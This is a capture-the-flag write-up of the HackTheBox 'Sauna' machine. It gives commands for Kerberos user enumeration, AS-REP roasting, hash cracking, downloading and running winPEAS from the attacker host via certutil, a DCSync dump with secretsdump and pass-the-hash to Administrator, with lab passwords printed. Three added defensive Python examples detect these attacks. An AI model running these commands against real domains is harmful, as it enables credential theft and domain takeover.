
HackTheBox - Sauna Writeup

tags: writeup HackTheBox Sauna Easy OSCP Pass-The-Hash Evil-WinRM Kerbrute Impacket

Port Scanning

# Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.066s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-26 17:13:08Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18h56m13s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-26T17:13:17
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 25 18:17:41 2022 -- 1 IP address (1 host up) scanned in 59.48 seconds
  • Port 53 : DNS Server
  • Port 80 : HTTP Server
  • Port 88 : Kerberos - Sec
  • Port 135 : MSRPC
  • Port 139 : Netbios-ssn
  • Port 389 : LDAP
  • Port 445 : Microsoft-ds
  • Port 464 : kpasswd5
  • Port 593 : ncacn_http
  • Port 636 : Tcpwrapped

Enumeration

Knowing that Kerberos is exposed, we enumerate valid domain users with kerbrute:

/opt/kerbrute/kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Exploitation

After enumerating users, it's time to try AS-REP roasting to obtain krb5asrep hashes. In this case the fsmith account can be AS-REP roasted with the following command:

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -no-pass

We obtain the hash and have to crack it; I use john.


john kerberos --wordlist=/usr/share/wordlists/rockyou.txt

We obtain the following password:

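From the defender's side, the AS-REP roast above leaves a trace: each roastable account produces a 4768 TGT request with pre-authentication type 0 and, when RC4 is negotiated, ticket encryption type 0x17. The following Python is an added example (not from the original writeup) that runs that check over constructed, flattened 4768 records and also flags accounts whose userAccountControl carries the no-preauth bit; the key=value event layout, the sample IPs and the userAccountControl values are assumptions.

```python
import re

# Constructed sample of Windows Security event 4768 (Kerberos TGT request)
# flattened to key=value text; real events are EVTX/XML. The field names
# mirror the 4768 XML (TargetUserName, PreAuthType, TicketEncryptionType,
# Status). Users other than those in the writeup and all IPs are made up.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=fsmith ServiceName=krbtgt IpAddress=10.10.10.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=Administrator ServiceName=krbtgt IpAddress=10.10.10.175 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=SAUNA$ ServiceName=krbtgt IpAddress=10.10.10.175 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_loanmgr ServiceName=krbtgt IpAddress=10.10.10.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=nobody ServiceName=krbtgt IpAddress=10.10.10.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
]

# userAccountControl bit "Do not require Kerberos preauthentication" (ADS_UF_DONT_REQUIRE_PREAUTH).
UF_DONT_REQUIRE_PREAUTH = 0x400000

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def find_asrep_roast(lines):
    """Successful TGT requests with no pre-authentication and an RC4 (0x17) ticket.

    PreAuthType 0 means the KDC handed out the AS-REP without the client proving
    the password first; with RC4 that reply is exactly what GetNPUsers collects
    and john cracks as krb5asrep. Returns (user, source ip) pairs.
    """
    hits = []
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue  # other events, or failed requests (0x6 = unknown principal)
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType", "").lower() == "0x17":
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


def accounts_without_preauth(uac_by_user):
    """Hygiene check: accounts whose userAccountControl has the no-preauth bit set."""
    return sorted(user for user, uac in uac_by_user.items() if uac & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    for user, ip in find_asrep_roast(SAMPLE_4768):
        print(f"possible AS-REP roast of {user} from {ip}")
    # constructed UAC values: 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH
    print("no-preauth accounts:", accounts_without_preauth({"fsmith": 0x410200, "Administrator": 0x10200}))
```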

Shell with evil-winrm

With the username and password known, we can obtain a shell with evil-winrm using the following command:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Now it's time to start the privilege escalation.


⏫Root Privesc

First we upload a copy of winPEAS to enumerate the system. Start an HTTP server on the attacking machine:

python3 -m http.server 80

I use certutil to download it onto the target machine and run it:

certutil -urlcache -f http://10.10.10.10/winPEASx64.exe winpeas.exe
c:\Windows\System32\cmd.exe /c winpeas.exe

Reading the winPEAS report, it found some autologon credentials:


With these credentials we can get a shell as svc_loanmanager with evil-winrm again, but this time we use the python BloodHound ingestor to enumerate the AD and find a path to Administrator credentials. Use the following command to obtain the JSON files that we then import into the BloodHound app.

Here is a link that shows how to use BloodHound.

bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c All

Importing the JSON files into BloodHound and running the query "Find Principals with DCSync Rights", we see that svc_loanmgr has them, so we can use impacket-secretsdump to perform the DCSync attack and dump the NTLM hashes, which we can then use for Pass-The-Hash.

impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175

After that we enter the password and receive a lot of hashes. Since what we obtain are NTLM hashes, we can use the second part of each hash, the NT hash, to pass the hash and obtain a shell as Administrator.
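The DCSync performed above is visible on the domain controller as event 4662 carrying the replication control-access GUIDs in its Properties field, issued by a principal that is not a DC. This added Python example (not part of the writeup) runs that check over constructed 4662 records; the key=value layout, the DC allowlist and the sample lines are assumptions.

```python
import re

# Control access rights a DCSync (DRSUAPI replication) needs. In a 4662 event
# they show up in the Properties field as GUIDs; secretsdump's DCSync path
# exercises the first two.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 samples flattened to key=value text (real events are EVTX/XML).
# AccessMask 0x100 is "Control Access", the mask used for these extended rights.
# The last line uses a made-up GUID to stand in for an unrelated property.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=SAUNA$ SubjectDomainName=EGOTISTICAL-BANK ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_loanmgr SubjectDomainName=EGOTISTICAL-BANK ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=fsmith SubjectDomainName=EGOTISTICAL-BANK ObjectType=user AccessMask=0x20 Properties={deadbeef-0000-0000-0000-000000000001}",
]

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def find_dcsync(lines, dc_accounts):
    """Flag replication rights exercised by anything that is not a domain controller.

    dc_accounts is the allowlist of DC machine accounts (e.g. {"SAUNA$"}); any
    other principal using Get-Changes / Get-Changes-All is the DCSync signature.
    Returns (user, [rights]) pairs.
    """
    allow = {a.upper() for a in dc_accounts}
    hits = []
    for line in lines:
        fields = dict(FIELD_RE.findall(line))
        if fields.get("EventID") != "4662" or fields.get("AccessMask") != "0x100":
            continue  # not a control-access operation
        rights = sorted({REPLICATION_RIGHTS[g.lower()]
                         for g in GUID_RE.findall(line) if g.lower() in REPLICATION_RIGHTS})
        user = fields.get("SubjectUserName", "")
        if rights and user.upper() not in allow:
            hits.append((user, rights))
    return hits


if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE_4662, {"SAUNA$"}):
        print(f"DCSync indicator: {user} used {', '.join(rights)}")
```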


Each dumped line is composed of the account's username, the account ID (RID), the LM hash and the NT hash, all separated by colons.
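As an added example (not from the writeup), here is a small parser for that user:rid:lm:nt::: layout used the way a defender would, to audit a dump for blank passwords, legacy LM hashes still stored and NT hashes shared between accounts; the sample lines, RIDs and every hash value other than the two well-known empty-string hashes are constructed.

```python
# Well-known hashes of the empty string, as emitted by secretsdump for an
# account with no LM hash stored / a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's NTDS output layout; the RIDs and all
# non-empty hash values are made up and are not the box's real hashes.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
fsmith:1105:22222222222222222222222222222222:33333333333333333333333333333333:::
"""


def parse_line(line):
    """Split 'user:rid:lm:nt:::' into a dict; returns None for lines in another layout."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return {"user": parts[0], "rid": int(parts[1]), "lm": parts[2].lower(), "nt": parts[3].lower()}


def audit_dump(text):
    """Password-hygiene findings a defender would pull from such a dump."""
    entries = [e for e in map(parse_line, text.splitlines()) if e]
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_password": [users for nt, users in by_nt.items() if nt != EMPTY_NT and len(users) > 1],
    }


if __name__ == "__main__":
    for finding, who in audit_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {who}")
```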

Using Evil-winrm we can Pass-The-Hash and obtain the shell with the following command:

evil-winrm -i 10.10.10.175 -u Administrator -H NTHash


And after that we are Domain Admins with Administrator rights, so we can do everything we want!


You can find me on: Twitter, Github, TryHackMe, HackTheBox